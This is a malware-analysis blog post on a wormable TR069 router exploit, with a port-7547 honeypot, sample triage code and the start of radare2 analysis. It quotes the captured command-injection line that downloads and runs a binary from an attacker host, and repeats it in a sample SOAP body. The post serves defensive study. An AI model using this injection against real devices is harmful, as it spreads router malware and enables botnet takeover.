TL;DR - A wormable exploit for the recently published TR069 vulnerability is being actively used in the wild. I pulled down some samples and hacked together a goofy way to perform dynamic analysis with Docker, QEMU, and tcpdump. The C2 domains are tr069[.]support and tr069[.]online.
There are several different botnets propagating this worm. I'm only going to document one of them in this post. Also, I haven't written a blog post in about a year, so here goes nothing.
A few articles about the recent TR069 vulnerability have crossed my news feed, including the following:
I figured I'd whip up a web server on a machine I had lying around (something like a Raspberry Pi), forward TCP port 7547 through my router, and run a sniffer alongside it to catch any funky stuff.
Within about five minutes I was getting hits. The malicious requests have already been documented in some of the aforementioned posts, but they look something like this:
[code]POST /UD/act?1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
[/code]
Notice the not-so-subtle command injection in this line:
[code]`cd /tmp;wget http://srrys.pw/1;chmod 777 1;./1`[/code]
So I routed curl through Tor and downloaded the sample. Also, having reversed a decent amount of shitty IoT worms in my day, I went on a hunch and requested hxxp://srrys[.]pw/2 through hxxp://srrys[.]pw/10 as well and got more hits.
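If you want to catch these requests yourself without handing the scanner anything that actually runs, here is a small honeypot listener for port 7547. This is an added example, not the web server or sniffer from the post: it logs each request, pulls the backtick-wrapped command out of the body, and defangs any download URLs so they can be pasted straight into notes. The post only shows the request line, the User-Agent and the injected command, so the SOAP element names in the constructed sample body below are assumptions.

```python
"""Minimal TR-064 honeypot listener plus payload extractor.

Added example, not the author's tooling. Binds TCP/7547, logs each POST and
pulls the backtick-wrapped shell command and the URLs it fetches out of the
body. Nothing from the request is ever executed or fetched.
"""
import re
from http.server import BaseHTTPRequestHandler, HTTPServer

# The injected command arrives wrapped in backticks, as in the post.
CMD_RE = re.compile(r"`([^`]+)`")
URL_RE = re.compile(r"https?://[^\s;'\"<>`]+")


def extract_payload(body: str) -> dict:
    """Return every backtick command in body and the URLs those commands fetch."""
    commands = CMD_RE.findall(body)
    urls = []
    for cmd in commands:
        urls.extend(URL_RE.findall(cmd))
    return {"commands": commands, "urls": urls}


def defang(url: str) -> str:
    """hxxp://host[.]tld/path form, so the URL can't be clicked by accident."""
    scheme, rest = url.split("://", 1)
    host, _, path = rest.partition("/")
    scheme = scheme.replace("http", "hxxp")  # http -> hxxp, https -> hxxps
    host = host.replace(".", "[.]")
    return f"{scheme}://{host}" + (f"/{path}" if path else "")


class TR064Handler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode("latin-1", "replace")
        found = extract_payload(body)
        self.log_message("%s %s ua=%r cmds=%r urls=%r",
                         self.client_address[0], self.path,
                         self.headers.get("User-Agent"),
                         found["commands"],
                         [defang(u) for u in found["urls"]])
        # Answer with an empty 200 so the scanner moves on; we never act on the body.
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"<html></html>")

    do_GET = do_POST  # some scanners probe with GET first; log those too


def serve(port: int = 7547) -> None:
    HTTPServer(("0.0.0.0", port), TR064Handler).serve_forever()


# Constructed sample body (not a capture from the post): the injected command
# from the post sitting inside an NTP-server field of a SOAP request. The
# SetNTPServers/NewNTPServer1 names are an assumption for illustration.
SAMPLE_BODY = (
    '<?xml version="1.0"?><SOAP-ENV:Envelope><SOAP-ENV:Body>'
    "<u:SetNTPServers><NewNTPServer1>"
    "`cd /tmp;wget http://srrys.pw/1;chmod 777 1;./1`"
    "</NewNTPServer1></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>"
)

if __name__ == "__main__":
    print(extract_payload(SAMPLE_BODY))
    serve()
```

Run it on the box you forward 7547 to and tail its output; the extractor is deliberately dumb (any backtick span counts), which is what you want for a honeypot since the operators change the exact SOAP wrapping between campaigns.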
[code]$ file *
1: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
2: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
3: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
4: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
5: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
6: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
7: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped[/code]
...with the following SHA256 hashes...
[code]5d4e46b3510679dc49ce295b7f448cd69e952d80ba1450f6800be074992b07cc 7[/code]
If you've ever tracked IoT threats before this will be a familiar sight: a lot of malware is cross-compiled for many different architectures, like in this example.
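When a dropper serves one binary per architecture like this, the first thing you want is the class, endianness and machine of each file plus its hash, without running anything. The following is an added example (not code from the post) that reads just the ELF e_ident, e_type and e_machine fields, which is enough to reproduce the architecture column of the `file` listing above, and SHA-256s each file. The headers in SAMPLES are constructed here for the self-test; they are not bytes from the real samples.

```python
"""Offline triage of cross-compiled samples: ELF header parse + SHA-256.

Added example, not code from the original post. Only the e_ident, e_type
and e_machine fields are read, so a sample directory full of hostile
binaries (and the odd HTML error page) can be inventoried safely.
"""
import hashlib
import struct
from pathlib import Path

ELF_MAGIC = b"\x7fELF"

# e_machine values from the ELF specification; these cover the seven
# architectures in the `file` listing above plus x86 for comparison.
MACHINES = {
    0x02: "SPARC",
    0x03: "Intel 80386",
    0x04: "Motorola m68k",
    0x08: "MIPS",
    0x14: "PowerPC",
    0x28: "ARM",
    0x2A: "Renesas SH",
    0x3E: "x86-64",
}
TYPES = {1: "relocatable", 2: "executable", 3: "shared object", 4: "core"}


def parse_elf_header(data: bytes) -> dict:
    """Return bits, endianness, type and machine of an ELF image.

    Raises ValueError for anything that is not a well-formed ELF header,
    which is what you want for the stray shell scripts and 404 pages that
    end up in a sample directory.
    """
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    bits = {1: 32, 2: 64}.get(data[4])      # EI_CLASS
    order = {1: "<", 2: ">"}.get(data[5])   # EI_DATA: 1 = little, 2 = big endian
    if bits is None or order is None:
        raise ValueError("bad EI_CLASS or EI_DATA")
    # e_type and e_machine sit right after the 16-byte e_ident and are stored
    # in the file's own byte order, hence the unpack prefix.
    e_type, e_machine = struct.unpack(order + "HH", data[16:20])
    return {
        "bits": bits,
        "endian": "LSB" if order == "<" else "MSB",
        "type": TYPES.get(e_type, f"type 0x{e_type:x}"),
        "machine": MACHINES.get(e_machine, f"unknown (0x{e_machine:x})"),
    }


def describe(data: bytes) -> str:
    """One-line summary in the spirit of `file`."""
    h = parse_elf_header(data)
    return f"ELF {h['bits']}-bit {h['endian']} {h['type']}, {h['machine']}"


def triage_dir(path: str) -> list:
    """Hash and describe every regular file under path, in name order."""
    rows = []
    for p in sorted(Path(path).iterdir()):
        if not p.is_file():
            continue
        data = p.read_bytes()
        try:
            desc = describe(data)
        except ValueError as err:
            desc = f"not ELF ({err})"
        rows.append({"name": p.name,
                     "sha256": hashlib.sha256(data).hexdigest(),
                     "desc": desc})
    return rows


def fake_elf32(order: str, machine: int) -> bytes:
    """Constructed 52-byte ELF32 header; only the fields parsed above are meaningful."""
    e_ident = ELF_MAGIC + bytes([1, 1 if order == "<" else 2, 1]) + b"\x00" * 9
    # e_type=EXEC, e_machine, e_version=1, entry/phoff/shoff/flags=0, e_ehsize=52, rest 0
    rest = struct.pack(order + "HHIIIIIHHHHHH",
                       2, machine, 1, 0, 0, 0, 0, 52, 0, 0, 0, 0, 0)
    return e_ident + rest


# Constructed stand-ins mirroring rows of the listing above (not the real bytes).
SAMPLES = {
    "1": fake_elf32("<", 0x08),  # ELF 32-bit LSB executable, MIPS
    "2": fake_elf32(">", 0x08),  # ELF 32-bit MSB executable, MIPS
    "3": fake_elf32("<", 0x28),  # ELF 32-bit LSB executable, ARM
    "6": fake_elf32(">", 0x02),  # ELF 32-bit MSB executable, SPARC
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(name, hashlib.sha256(blob).hexdigest(), describe(blob))
```

Point `triage_dir` at the directory you pulled the samples into and you get name, SHA-256 and architecture per file; the endianness field is what tells you whether to reach for the `mipsel` or `mips` QEMU user-mode binary later.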
Let's do some basic static analysis. This is usually where I'd bust out my IDA Pro, but some fucker stole my laptop recently and I haven't gotten my new license yet. So instead we're going to use Radare2, something equally cool but less familiar to me. Shouts out to the R2 team. Keep doing God's work.
[code]$ r2 1
Warning: Cannot initialize dynamic strings
-- Change the graph block definition with graph.callblocks, graph.jmpblocks, graph.flagblocks
[x] Analyze all flags starting with sym. and entry0 (aa)[/code]
I run the aa command to analyze the code/functions, followed by pdf @main to disassemble main in the regular mode, and V @main plus the space bar to view it in visual (graph) mode.